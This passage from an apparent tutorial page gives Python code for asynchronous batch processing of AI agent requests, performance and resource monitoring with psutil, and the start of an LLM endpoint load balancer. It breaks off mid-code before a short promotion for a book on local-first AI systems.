441 self.running_jobs[job_id] = {
442 "status": "running",
443 "total_items": len(items),
444 "completed_items": 0,
445 "results": {},
446 "errors": {},
447 "start_time": time.time()
448 }
449
450 # Process items in batches asynchronously
451 import asyncio
452 asyncio.create_task(self._process_batch(job_id, items, agent_type, max_concurrency))
453
454 return job_id
455
456 async def _process_batch(self,
457 job_id: str,
458 items: List[Dict[str, Any]],
459 agent_type: str,
460 max_concurrency: int):
461 """
462 Process a batch of items.
463
464 Args:
465 job_id: Job ID
466 items: List of items to process
467 agent_type: Type of agent to use
468 max_concurrency: Maximum concurrent processing
469 """
470 import asyncio
471
472 # Process in batches to control concurrency
473 for i in range(0, len(items), max_concurrency):
474 batch = items[i:i + max_concurrency]
475
476 # Process batch concurrently
477 tasks = []
478 for item in batch:
479 item_id = item.get("id", f"item_{i}")
480 message = item.get("message", "")
481 context = item.get("context")
482
483 task = self._process_item(item_id, message, context, agent_type)
484 tasks.append(task)
485
486 # Wait for all tasks in this batch to complete
487 results = await asyncio.gather(*tasks, return_exceptions=True)
488
489 # Update job status
490 for item_id, result in results:
491 if isinstance(result, Exception):
492 self.running_jobs[job_id]["errors"][item_id] = str(result)
493 else:
494 self.running_jobs[job_id]["results"][item_id] = result
495
496 self.running_jobs[job_id]["completed_items"] += 1
497
498 # Mark job as completed
499 self.running_jobs[job_id]["status"] = "completed"
500 self.running_jobs[job_id]["end_time"] = time.time()
501 self.running_jobs[job_id]["duration"] = self.running_jobs[job_id]["end_time"] - self.running_jobs[job_id]["start_time"]
502
503 async def _process_item(self,
504 item_id: str,
505 message: str,
506 context: Optional[str],
507 agent_type: str) -> Tuple[str, Any]:
508 """
509 Process a single item.
510
511 Args:
512 item_id: Item ID
513 message: Message to process
514 context: Optional context
515 agent_type: Type of agent to use
516
517 Returns:
518 Tuple of (item_id, result)
519 """
520 try:
521 # Get an agent from the pool
522 agent_ref = await self.agent_manager.get_agent.remote(agent_type)
523
524 # Process the request
525 response = await agent_ref.generate_response.remote(message, context)
526
527 # Release the agent back to the pool
528 await self.agent_manager.release_agent.remote(agent_ref, agent_type)
529
530 return item_id, response
531
532 except Exception as e:
533 logger.error(f"Error processing item {item_id}: {e}")
534 return item_id, e
535
536 async def get_job_status(self, job_id: str) -> Dict[str, Any]:
537 """
538 Get the status of a batch job.
539
540 Args:
541 job_id: Job ID
542
543 Returns:
544 Job status
545 """
546 if job_id not in self.running_jobs:
547 return {"error": f"Job {job_id} not found"}
548
549 job_data = self.running_jobs[job_id].copy()
550
551 # Calculate progress
552 total_items = job_data["total_items"]
553 completed_items = job_data["completed_items"]
554 progress = (completed_items / total_items) * 100 if total_items > 0 else 0
555
556 job_data["progress"] = progress
557
558 # Limit the size of the response
559 if len(job_data["results"]) > 10:
560 result_sample = {k: job_data["results"][k] for k in list(job_data["results"])[:10]}
561 job_data["results"] = result_sample
562 job_data["results_truncated"] = True
563
564 if len(job_data["errors"]) > 10:
565 error_sample = {k: job_data["errors"][k] for k in list(job_data["errors"])[:10]}
566 job_data["errors"] = error_sample
567 job_data["errors_truncated"] = True
568
569 return job_data
570
571 async def list_jobs(self) -> List[Dict[str, Any]]:
572 """
573 List all batch jobs.
574
575 Returns:
576 List of job summaries
577 """
578 job_summaries = []
579
580 for job_id, job_data in self.running_jobs.items():
581 total_items = job_data["total_items"]
582 completed_items = job_data["completed_items"]
583 progress = (completed_items / total_items) * 100 if total_items > 0 else 0
584
585 summary = {
586 "job_id": job_id,
587 "status": job_data["status"],
588 "progress": progress,
589 "total_items": total_items,
590 "completed_items": completed_items,
591 "start_time": job_data.get("start_time"),
592 "end_time": job_data.get("end_time"),
593 "duration": job_data.get("duration"),
594 "error_count": len(job_data["errors"])
595 }
596
597 job_summaries.append(summary)
598
599 return job_summaries

2. Performance Monitoring and Resource Management

python
1# monitoring/performance_tracker.py
2import os
3import time
4import json
5import threading
6import logging
7import psutil
8import numpy as np
9from typing import Dict, List, Any, Optional, Union, Tuple
10from dataclasses import dataclass, field
11
12logger = logging.getLogger(__name__)
13
14@dataclass
15class PerformanceMetrics:
16 """Performance metrics for AI agent operations."""
17 operation_id: str
18 operation_type: str
19 start_time: float
20 end_time: Optional[float] = None
21 duration: Optional[float] = None
22 success: bool = True
23 error: Optional[str] = None
24 token_count: Optional[int] = None
25 token_cost: Optional[float] = None
26 cpu_percent: Optional[float] = None
27 memory_mb: Optional[float] = None
28 metadata: Dict[str, Any] = field(default_factory=dict)
29
30class PerformanceTracker:
31 """
32 Tracks performance metrics for AI agent operations.
33 """
34
35 def __init__(self, metrics_path: Optional[str] = None):
36 """
37 Initialize the performance tracker.
38
39 Args:
40 metrics_path: Optional path for storing metrics
41 """
42 self.metrics_path = metrics_path
43 self.metrics = []
44 self.lock = threading.RLock()
45
46 # Initialize process monitoring
47 self.process = psutil.Process(os.getpid())
48
49 # Start metrics saving thread if path provided
50 if metrics_path:
51 self._start_metrics_saving()
52
53 def start_operation(self,
54 operation_type: str,
55 metadata: Optional[Dict[str, Any]] = None) -> str:
56 """
57 Start tracking an operation.
58
59 Args:
60 operation_type: Type of operation
61 metadata: Optional metadata
62
63 Returns:
64 Operation ID
65 """
66 operation_id = f"op_{time.time()}_{len(self.metrics)}"
67
68 # Create metrics object
69 metrics = PerformanceMetrics(
70 operation_id=operation_id,
71 operation_type=operation_type,
72 start_time=time.time(),
73 metadata=metadata or {}
74 )
75
76 # Snapshot resource usage at start
77 try:
78 metrics.cpu_percent = self.process.cpu_percent(interval=0.1)
79 metrics.memory_mb = self.process.memory_info().rss / (1024 * 1024)
80 except:
81 pass
82
83 # Store metrics
84 with self.lock:
85 self.metrics.append(metrics)
86
87 return operation_id
88
89 def end_operation(self,
90 operation_id: str,
91 success: bool = True,
92 error: Optional[str] = None,
93 token_count: Optional[int] = None,
94 token_cost: Optional[float] = None,
95 additional_metadata: Optional[Dict[str, Any]] = None) -> Optional[PerformanceMetrics]:
96 """
97 End tracking an operation.
98
99 Args:
100 operation_id: Operation ID
101 success: Whether the operation was successful
102 error: Optional error message
103 token_count: Optional token count
104 token_cost: Optional token cost
105 additional_metadata: Optional additional metadata
106
107 Returns:
108 Updated metrics or None if operation not found
109 """
110 with self.lock:
111 # Find the operation
112 for metrics in self.metrics:
113 if metrics.operation_id == operation_id:
114 # Update metrics
115 metrics.end_time = time.time()
116 metrics.duration = metrics.end_time - metrics.start_time
117 metrics.success = success
118 metrics.error = error
119 metrics.token_count = token_count
120 metrics.token_cost = token_cost
121
122 # Update metadata
123 if additional_metadata:
124 metrics.metadata.update(additional_metadata)
125
126 # Snapshot resource usage at end
127 try:
128 metrics.cpu_percent = self.process.cpu_percent(interval=0.1)
129 metrics.memory_mb = self.process.memory_info().rss / (1024 * 1024)
130 except:
131 pass
132
133 return metrics
134
135 logger.warning(f"Operation {operation_id} not found")
136 return None
137
138 def get_operation_metrics(self, operation_id: str) -> Optional[PerformanceMetrics]:
139 """
140 Get metrics for a specific operation.
141
142 Args:
143 operation_id: Operation ID
144
145 Returns:
146 Operation metrics or None if not found
147 """
148 with self.lock:
149 for metrics in self.metrics:
150 if metrics.operation_id == operation_id:
151 return metrics
152
153 return None
154
155 def get_metrics_summary(self) -> Dict[str, Any]:
156 """
157 Get a summary of all metrics.
158
159 Returns:
160 Dictionary with metrics summary
161 """
162 with self.lock:
163 # Count operations by type
164 operation_counts = {}
165 for metrics in self.metrics:
166 operation_type = metrics.operation_type
167 operation_counts[operation_type] = operation_counts.get(operation_type, 0) + 1
168
169 # Calculate success rates
170 success_rates = {}
171 for operation_type in operation_counts.keys():
172 type_metrics = [m for m in self.metrics if m.operation_type == operation_type]
173 success_count = sum(1 for m in type_metrics if m.success)
174 success_rates[operation_type] = success_count / len(type_metrics) if type_metrics else 0
175
176 # Calculate average durations
177 avg_durations = {}
178 for operation_type in operation_counts.keys():
179 type_metrics = [m for m in self.metrics if m.operation_type == operation_type and m.duration is not None]
180 if type_metrics:
181 avg_durations[operation_type] = sum(m.duration for m in type_metrics) / len(type_metrics)
182 else:
183 avg_durations[operation_type] = None
184
185 # Calculate token usage and costs
186 token_usage = {}
187 token_costs = {}
188 for operation_type in operation_counts.keys():
189 type_metrics = [m for m in self.metrics if m.operation_type == operation_type and m.token_count is not None]
190 if type_metrics:
191 token_usage[operation_type] = sum(m.token_count for m in type_metrics)
192 token_costs[operation_type] = sum(m.token_cost for m in type_metrics if m.token_cost is not None)
193 else:
194 token_usage[operation_type] = None
195 token_costs[operation_type] = None
196
197 # Create summary
198 return {
199 "total_operations": len(self.metrics),
200 "operation_counts": operation_counts,
201 "success_rates": success_rates,
202 "avg_durations": avg_durations,
203 "token_usage": token_usage,
204 "token_costs": token_costs
205 }
206
207 def get_performance_report(self) -> Dict[str, Any]:
208 """
209 Generate a detailed performance report.
210
211 Returns:
212 Dictionary with performance report
213 """
214 with self.lock:
215 # Copy metrics to avoid modification during analysis
216 metrics_copy = self.metrics.copy()
217
218 # Only analyze completed operations
219 completed = [m for m in metrics_copy if m.duration is not None]
220 if not completed:
221 return {"error": "No completed operations to analyze"}
222
223 # Group by operation type
224 by_type = {}
225 for metrics in completed:
226 operation_type = metrics.operation_type
227 if operation_type not in by_type:
228 by_type[operation_type] = []
229 by_type[operation_type].append(metrics)
230
231 # Analyze each operation type
232 type_reports = {}
233 for operation_type, type_metrics in by_type.items():
234 # Extract durations
235 durations = [m.duration for m in type_metrics]
236
237 # Calculate statistics
238 type_report = {
239 "count": len(type_metrics),
240 "success_count": sum(1 for m in type_metrics if m.success),
241 "error_count": sum(1 for m in type_metrics if not m.success),
242 "success_rate": sum(1 for m in type_metrics if m.success) / len(type_metrics),
243 "duration": {
244 "min": min(durations),
245 "max": max(durations),
246 "mean": np.mean(durations),
247 "median": np.median(durations),
248 "p95": np.percentile(durations, 95),
249 "p99": np.percentile(durations, 99)
250 }
251 }
252
253 # Calculate token usage if available
254 token_counts = [m.token_count for m in type_metrics if m.token_count is not None]
255 if token_counts:
256 type_report["token_usage"] = {
257 "min": min(token_counts),
258 "max": max(token_counts),
259 "mean": np.mean(token_counts),
260 "median": np.median(token_counts),
261 "total": sum(token_counts)
262 }
263
264 # Calculate costs if available
265 costs = [m.token_cost for m in type_metrics if m.token_cost is not None]
266 if costs:
267 type_report["cost"] = {
268 "min": min(costs),
269 "max": max(costs),
270 "mean": np.mean(costs),
271 "total": sum(costs)
272 }
273
274 # Add to type reports
275 type_reports[operation_type] = type_report
276
277 # Create overall report
278 all_durations = [m.duration for m in completed]
279 overall = {
280 "total_operations": len(completed),
281 "success_rate": sum(1 for m in completed if m.success) / len(completed),
282 "duration": {
283 "min": min(all_durations),
284 "max": max(all_durations),
285 "mean": np.mean(all_durations),
286 "median": np.median(all_durations),
287 "p95": np.percentile(all_durations, 95)
288 }
289 }
290
291 # Calculate overall token usage and cost
292 all_tokens = [m.token_count for m in completed if m.token_count is not None]
293 all_costs = [m.token_cost for m in completed if m.token_cost is not None]
294
295 if all_tokens:
296 overall["total_tokens"] = sum(all_tokens)
297 overall["avg_tokens_per_operation"] = sum(all_tokens) / len(all_tokens)
298
299 if all_costs:
300 overall["total_cost"] = sum(all_costs)
301 overall["avg_cost_per_operation"] = sum(all_costs) / len(all_costs)
302
303 # Return the complete report
304 return {
305 "overall": overall,
306 "by_operation_type": type_reports,
307 "generated_at": time.time()
308 }
309
310 def clear_metrics(self, older_than_seconds: Optional[float] = None):
311 """
312 Clear metrics from memory.
313
314 Args:
315 older_than_seconds: Optional time threshold to only clear older metrics
316 """
317 with self.lock:
318 if older_than_seconds is not None:
319 threshold = time.time() - older_than_seconds
320 self.metrics = [m for m in self.metrics if m.start_time >= threshold]
321 else:
322 self.metrics = []
323
324 def _start_metrics_saving(self):
325 """Start a background thread to periodically save metrics."""
326 def save_metrics_task():
327 while True:
328 try:
329 with self.lock:
330 # Only save completed operations
331 completed = [m for m in self.metrics if m.duration is not None]
332
333 # Convert to dictionary for serialization
334 metrics_dicts = []
335 for metrics in completed:
336 metrics_dict = {
337 "operation_id": metrics.operation_id,
338 "operation_type": metrics.operation_type,
339 "start_time": metrics.start_time,
340 "end_time": metrics.end_time,
341 "duration": metrics.duration,
342 "success": metrics.success,
343 "error": metrics.error,
344 "token_count": metrics.token_count,
345 "token_cost": metrics.token_cost,
346 "cpu_percent": metrics.cpu_percent,
347 "memory_mb": metrics.memory_mb,
348 "metadata": metrics.metadata
349 }
350 metrics_dicts.append(metrics_dict)
351
352 # Save to file
353 with open(self.metrics_path, 'w') as f:
354 json.dump(metrics_dicts, f, indent=2)
355
356 logger.debug(f"Saved {len(metrics_dicts)} metrics to {self.metrics_path}")
357
358 except Exception as e:
359 logger.error(f"Error saving metrics: {e}")
360
361 # Sleep for 5 minutes
362 time.sleep(300)
363
364 # Start thread
365 save_thread = threading.Thread(target=save_metrics_task, daemon=True)
366 save_thread.start()
367
368class ResourceMonitor:
369 """
370 Monitors system resources and provides recommendations for scaling.
371 """
372
373 def __init__(self,
374 high_cpu_threshold: float = 80.0,
375 high_memory_threshold: float = 80.0,
376 sampling_interval: float = 5.0):
377 """
378 Initialize the resource monitor.
379
380 Args:
381 high_cpu_threshold: CPU usage percentage threshold for scaling recommendations
382 high_memory_threshold: Memory usage percentage threshold for scaling recommendations
383 sampling_interval: Sampling interval in seconds
384 """
385 self.high_cpu_threshold = high_cpu_threshold
386 self.high_memory_threshold = high_memory_threshold
387 self.sampling_interval = sampling_interval
388
389 self.is_monitoring = False
390 self.monitor_thread = None
391 self.samples = []
392 self.lock = threading.RLock()
393
394 def start_monitoring(self):
395 """Start resource monitoring."""
396 if self.is_monitoring:
397 return
398
399 self.is_monitoring = True
400 self.monitor_thread = threading.Thread(target=self._monitoring_task, daemon=True)
401 self.monitor_thread.start()
402
403 logger.info("Resource monitoring started")
404
405 def stop_monitoring(self):
406 """Stop resource monitoring."""
407 self.is_monitoring = False
408 if self.monitor_thread:
409 self.monitor_thread.join(timeout=1.0)
410 self.monitor_thread = None
411
412 logger.info("Resource monitoring stopped")
413
414 def _monitoring_task(self):
415 """Background task for monitoring resources."""
416 while self.is_monitoring:
417 try:
418 # Get CPU and memory usage
419 cpu_percent = psutil.cpu_percent(interval=1.0)
420 memory = psutil.virtual_memory()
421 memory_percent = memory.percent
422
423 # Get disk usage
424 disk = psutil.disk_usage('/')
425 disk_percent = disk.percent
426
427 # Get network IO
428 network = psutil.net_io_counters()
429
430 # Store sample
431 sample = {
432 "timestamp": time.time(),
433 "cpu_percent": cpu_percent,
434 "memory_percent": memory_percent,
435 "memory_used_gb": memory.used / (1024 * 1024 * 1024),
436 "memory_total_gb": memory.total / (1024 * 1024 * 1024),
437 "disk_percent": disk_percent,
438 "disk_used_gb": disk.used / (1024 * 1024 * 1024),
439 "disk_total_gb": disk.total / (1024 * 1024 * 1024),
440 "network_bytes_sent": network.bytes_sent,
441 "network_bytes_recv": network.bytes_recv
442 }
443
444 with self.lock:
445 self.samples.append(sample)
446
447 # Keep only the last 1000 samples
448 if len(self.samples) > 1000:
449 self.samples = self.samples[-1000:]
450
451 # Sleep until next sample
452 time.sleep(self.sampling_interval)
453
454 except Exception as e:
455 logger.error(f"Error in resource monitoring: {e}")
456 time.sleep(self.sampling_interval)
457
458 def get_current_usage(self) -> Dict[str, Any]:
459 """
460 Get current resource usage.
461
462 Returns:
463 Dictionary with current resource usage
464 """
465 try:
466 # Get CPU and memory usage
467 cpu_percent = psutil.cpu_percent(interval=0.5)
468 memory = psutil.virtual_memory()
469 memory_percent = memory.percent
470
471 # Get disk usage
472 disk = psutil.disk_usage('/')
473 disk_percent = disk.percent
474
475 # Get network IO
476 network = psutil.net_io_counters()
477
478 return {
479 "timestamp": time.time(),
480 "cpu_percent": cpu_percent,
481 "memory_percent": memory_percent,
482 "memory_used_gb": memory.used / (1024 * 1024 * 1024),
483 "memory_total_gb": memory.total / (1024 * 1024 * 1024),
484 "disk_percent": disk_percent,
485 "disk_used_gb": disk.used / (1024 * 1024 * 1024),
486 "disk_total_gb": disk.total / (1024 * 1024 * 1024),
487 "network_bytes_sent": network.bytes_sent,
488 "network_bytes_recv": network.bytes_recv
489 }
490
491 except Exception as e:
492 logger.error(f"Error getting current usage: {e}")
493 return {"error": str(e)}
494
495 def get_usage_history(self,
496 metric: str = "cpu_percent",
497 limit: int = 60) -> List[Tuple[float, float]]:
498 """
499 Get historical usage data for a specific metric.
500
501 Args:
502 metric: Metric to retrieve (e.g., cpu_percent, memory_percent)
503 limit: Maximum number of samples to return
504
505 Returns:
506 List of (timestamp, value) tuples
507 """
508 with self.lock:
509 # Copy samples to avoid modification during processing
510 samples = self.samples[-limit:] if limit > 0 else self.samples
511
512 # Extract specified metric
513 history = [(s["timestamp"], s.get(metric, 0)) for s in samples if metric in s]
514
515 return history
516
517 def get_scaling_recommendation(self) -> Dict[str, Any]:
518 """
519 Get scaling recommendations based on resource usage.
520
521 Returns:
522 Dictionary with scaling recommendations
523 """
524 with self.lock:
525 # Get recent samples
526 recent_samples = self.samples[-30:] if len(self.samples) >= 30 else self.samples
527
528 if not recent_samples:
529 return {"recommendation": "insufficient_data", "reason": "Not enough monitoring data"}
530
531 # Calculate average resource usage
532 avg_cpu = sum(s["cpu_percent"] for s in recent_samples) / len(recent_samples)
533 avg_memory = sum(s["memory_percent"] for s in recent_samples) / len(recent_samples)
534
535 # Check for high CPU usage
536 if avg_cpu > self.high_cpu_threshold:
537 return {
538 "recommendation": "scale_up",
539 "reason": "high_cpu_usage",
540 "details": {
541 "avg_cpu_percent": avg_cpu,
542 "threshold": self.high_cpu_threshold,
543 "suggested_action": "Increase number of worker nodes or CPU allocation"
544 }
545 }
546
547 # Check for high memory usage
548 if avg_memory > self.high_memory_threshold:
549 return {
550 "recommendation": "scale_up",
551 "reason": "high_memory_usage",
552 "details": {
553 "avg_memory_percent": avg_memory,
554 "threshold": self.high_memory_threshold,
555 "suggested_action": "Increase memory allocation or add more nodes"
556 }
557 }
558
559 # Check for potential downscaling
560 if avg_cpu < self.high_cpu_threshold / 2 and avg_memory < self.high_memory_threshold / 2:
561 return {
562 "recommendation": "scale_down",
563 "reason": "low_resource_usage",
564 "details": {
565 "avg_cpu_percent": avg_cpu,
566 "avg_memory_percent": avg_memory,
567 "suggested_action": "Consider reducing resource allocation if this pattern persists"
568 }
569 }
570
571 # Default recommendation
572 return {
573 "recommendation": "maintain",
574 "reason": "resource_usage_within_limits",
575 "details": {
576 "avg_cpu_percent": avg_cpu,
577 "avg_memory_percent": avg_memory
578 }
579 }

3. Dynamic Load Balancing for LLM-Powered Systems

python
1# load_balancing/llm_load_balancer.py
2import os
3import time
4import json
5import random
6import logging
7import threading
8import datetime
9from typing import Dict, List, Any, Optional, Callable, TypeVar, Generic, Tuple
10
11T = TypeVar('T') # Input type
12R = TypeVar('R') # Result type
13
14logger = logging.getLogger(__name__)
15
16class ModelEndpoint:
17 """
18 Represents an LLM API endpoint with performance characteristics.
19 """
20
21 def __init__(self,
22 endpoint_id: str,
23 model_name: str,
24 api_key: str,
25 max_requests_per_minute: int,
26 max_tokens_per_minute: int,
27 latency_ms: float = 1000.0,
28 cost_per_1k_tokens: float = 0.0,
29 context_window: int = 4096,
30 endpoint_url: Optional[str] = None,
31 supports_functions: bool = False,
32 capabilities: List[str] = None):
33 """
34 Initialize a model endpoint.
35
36 Args:
37 endpoint_id: Unique identifier for this endpoint
38 model_name: Name of the model (e.g., gpt-4-turbo)
39 api_key: API key for this endpoint
40 max_requests_per_minute: Maximum requests per minute
41 max_tokens_per_minute: Maximum tokens per minute
42 latency_ms: Average latency in milliseconds
43 cost_per_1k_tokens: Cost per 1000 tokens
44 context_window: Maximum context window size in tokens
45 endpoint_url: Optional custom endpoint URL
46 supports_functions: Whether this endpoint supports function calling
47 capabilities: List of special capabilities this endpoint supports
48 """
49 self.endpoint_id = endpoint_id
50 self.model_name = model_name
51 self.api_key = api_key
52 self.max_requests_per_minute = max_requests_per_minute
53 self.max_tokens_per_minute = max_tokens_per_minute
54 self.latency_ms = latency_ms
55 self.cost_per_1k_tokens = cost_per_1k_tokens
56 self.context_window = context_window
57 self.endpoint_url = endpoint_url
58 self.supports_functions = supports_functions
59 self.capabilities = capabilities or []
60
61 # Metrics tracking
62 self.requests_last_minute = 0
63 self.tokens_last_minute = 0
64 self.last_request_time = 0
65 self.success_count = 0
66 self.error_count = 0
67 self.total_latency_ms = 0
68 self.total_tokens = 0
69 self.total_cost = 0.0
70
71 # Last minute tracking
72 self.request_timestamps = []
73 self.token_usage_events = []
74
75 # Health status
76 self.is_healthy = True
77 self.last_error = None
78 self.consecutive_errors = 0
79
80 # Lock for thread safety
81 self.lock = threading.RLock()
82
83 def update_metrics(self,
84 success: bool,
85 latency_ms: float,
86 tokens_used: int,
87 error: Optional[str] = None):
88 """
89 Update endpoint metrics after a request.
90
91 Args:
92 success: Whether the request was successful
93 latency_ms: Request latency in milliseconds
94 tokens_used: Number of tokens used
95 error: Optional error message
96 """
97 current_time = time.time()
98
99 with self.lock:
100 # Update overall metrics
101 if success:
102 self.success_count += 1
103 self.total_latency_ms += latency_ms
104 self.total_tokens += tokens_used
105 self.total_cost += (tokens_used / 1000) * self.cost_per_1k_tokens
106 self.last_error = None
107 self.consecutive_errors = 0
108 else:
109 self.error_count += 1
110 self.last_error = error
111 self.consecutive_errors += 1
112
113 # Mark as unhealthy after 3 consecutive errors
114 if self.consecutive_errors >= 3:
115 self.is_healthy = False
116
117 # Update last minute tracking
118 self.last_request_time = current_time
119 self.request_timestamps.append(current_time)
120
121 if tokens_used > 0:
122 self.token_usage_events.append((current_time, tokens_used))
123
124 # Remove old timestamps (older than 1 minute)
125 one_minute_ago = current_time - 60
126 self.request_timestamps = [ts for ts in self.request_timestamps if ts > one_minute_ago]
127 self.token_usage_events = [event for event in self.token_usage_events if event[0] > one_minute_ago]
128
129 # Update current rates
130 self.requests_last_minute = len(self.request_timestamps)
131 self.tokens_last_minute = sum(tokens for _, tokens in self.token_usage_events)
132
133 def can_handle_request(self, estimated_tokens: int = 1000) -> bool:
134 """
135 Check if this endpoint can handle a new request.
136
137 Args:
138 estimated_tokens: Estimated tokens for the request
139
140 Returns:
141 True if the endpoint can handle the request
142 """
143 with self.lock:
144 # Check health status
145 if not self.is_healthy:
146 return False
147
148 # Check rate limits
149 if self.requests_last_minute >= self.max_requests_per_minute:
150 return False
151
152 if self.tokens_last_minute + estimated_tokens > self.max_tokens_per_minute:
153 return False
154
155 return True
156
157 def get_load_percentage(self) -> Tuple[float, float]:
158 """
159 Get the current load percentage of this endpoint.
160
161 Returns:
162 Tuple of (requests_percentage, tokens_percentage)
163 """
164 with self.lock:
165 requests_percentage = (self.requests_last_minute / self.max_requests_per_minute) * 100 if self.max_requests_per_minute > 0 else 0
166 tokens_percentage = (self.tokens_last_minute / self.max_tokens_per_minute) * 100 if self.max_tokens_per_minute > 0 else 0
167
168 return (requests_percentage, tokens_percentage)
169
170 def get_metrics(self) -> Dict[str, Any]:
171 """
172 Get current endpoint metrics.
173
174 Returns:
175 Dictionary with endpoint metrics
176 """
177 with self.lock:
178 total_requests = self.success_count + self.error_count
179 avg_latency = self.total_latency_ms / self.success_count if self.success
Sovereign AI book cover

Sovereign AI: Building Local-First Intelligent Systems

by Daniel Kliewer · Paperback · 72 pages

The hands-on guide to building AI that runs on your hardware, keeps your data private, and eliminates cloud dependence. Working code included.